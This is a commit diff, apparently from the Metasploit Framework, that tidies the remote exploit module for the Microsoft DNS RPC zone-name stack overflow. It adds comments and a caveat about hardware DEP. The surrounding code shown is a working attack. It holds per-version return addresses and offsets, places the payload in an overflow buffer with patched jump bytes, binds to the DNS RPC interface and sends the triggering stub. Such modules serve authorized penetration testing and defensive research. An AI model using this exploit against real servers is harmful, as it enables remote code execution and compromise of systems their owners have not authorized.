Cleanup, getting ready for stable

git-svn-id: file:///home/svn/framework3/trunk@4684 4d416f70-5f16-0410-b530-b9f4589650da

modules/exploits/windows/dcerpc/msdns_zonename.rb

@@ -24,9 +24,11 @@ class Exploits::Windows::Dcerpc::Microsoft_DNS_RPC_ZoneName < Msf::Exploit::Remo
 			'Name'           => 'Microsoft DNS RPC Service extractQuotedChar() Overflow',
 			'Description'    => %q{
 				This module exploits a stack overflow in the RPC interface
-				of the Microsoft DNS service. The vulnerability is triggered
-				when a long zone name parameter is supplied that contains 
-				backslash characters. 
+			of the Microsoft DNS service. The vulnerability is triggered when
+			a long zone name is supplied that contains escaped characters. This
+			exploit will NOT work on Windows 2003 SP1 or SP2 if hardware DEP is
+			enabled.
+				
 			},
 			'Author'         => [ 'hdm' ],
 			'License'        => MSF_LICENSE,
@@ -68,10 +70,10 @@ class Exploits::Windows::Dcerpc::Microsoft_DNS_RPC_ZoneName < Msf::Exploit::Remo
 					# WS2HELP.DLL
 					[ 'Windows 2000 Server SP0-SP4+ English', { 'Off' => 1213, 'Ret' => 0x75022ac4 } ],
 
-					# Unknown, probably bad :(
+					# Unknown, probably unreliable
 					[ 'Windows 2003 Server SP0 English', { 'Off' => 1593, 'Ret' => 0x7ffc0960 } ],
 	
-					# ATL.DLL (no SafeSEH)
+					# ATL.DLL (no SafeSEH) (still blocked by hardware DEP)
 					[ 'Windows 2003 Server SP1-SP2 English', { 'Off' => 1633, 'Ret' => 0x76a81a60 } ],
 									
 				],
@@ -86,6 +88,8 @@ class Exploits::Windows::Dcerpc::Microsoft_DNS_RPC_ZoneName < Msf::Exploit::Remo
 	
 	def exploit
 
+
+		# Ask the endpoint mapper to locate the port for us
 		dport = datastore['RPORT'].to_i
 		if (dport == 0)
 			
@@ -99,17 +103,21 @@ class Exploits::Windows::Dcerpc::Microsoft_DNS_RPC_ZoneName < Msf::Exploit::Remo
 			print_status("Discovered Microsoft DNS Server RPC service on port #{dport}")
 		end
 
+		# Connect to the high RPC port
 		connect(true, { 'RPORT' => dport })
 		print_status("Trying target #{target.name}...")
 		
+		# Bind to the service
 		handle = dcerpc_handle('50abc2a4-574d-40b3-9d66-ee4fd5fba076', '5.0', 'ncacn_ip_tcp', [datastore['RPORT']])
 		print_status("Binding to #{handle} ...")
 		dcerpc_bind(handle)
 		print_status("Bound to #{handle} ...")
 
+		# Create our buffer with our shellcode first
 		txt = Rex::Text.rand_text_alphanumeric(8192)
 		txt[0, payload.encoded.length] = payload.encoded
 		
+		# Handle multi-return targets
 		if (target['Addresses'])
 			target['Addresses'].each do |ent|
 				off, ret = ent
@@ -117,6 +125,7 @@ class Exploits::Windows::Dcerpc::Microsoft_DNS_RPC_ZoneName < Msf::Exploit::Remo
 				txt[ off - 4, 2] = "\xeb\x06"
 				txt[ off + 4, 5] = "\xe9" + [ (off+9) * -1 ].pack('V')				
 			end
+		# Handle single-return targets
 		else
 			off = target['Off']
 			txt[ off ] = [target.ret].pack('V')
@@ -132,6 +141,7 @@ class Exploits::Windows::Dcerpc::Microsoft_DNS_RPC_ZoneName < Msf::Exploit::Remo
 			req << c.to_s(8)
 		end	
 
+		# Build the RPC stub data
 		stubdata =
 			NDR.long(rand(0xffffffff)) +
 			NDR.wstring(Rex::Text.rand_text_alpha(1) + "\x00\x00") +
@@ -142,7 +152,7 @@ class Exploits::Windows::Dcerpc::Microsoft_DNS_RPC_ZoneName < Msf::Exploit::Remo
 			NDR.long(rand(0xffffffff)) +
 			NDR.string(Rex::Text.rand_text_alpha(1) + "\x00")
 		
-		print_status('Sending exploit ...')
+		print_status('Sending exploit...')
 	
 		begin
 			response = dcerpc.call(1, stubdata)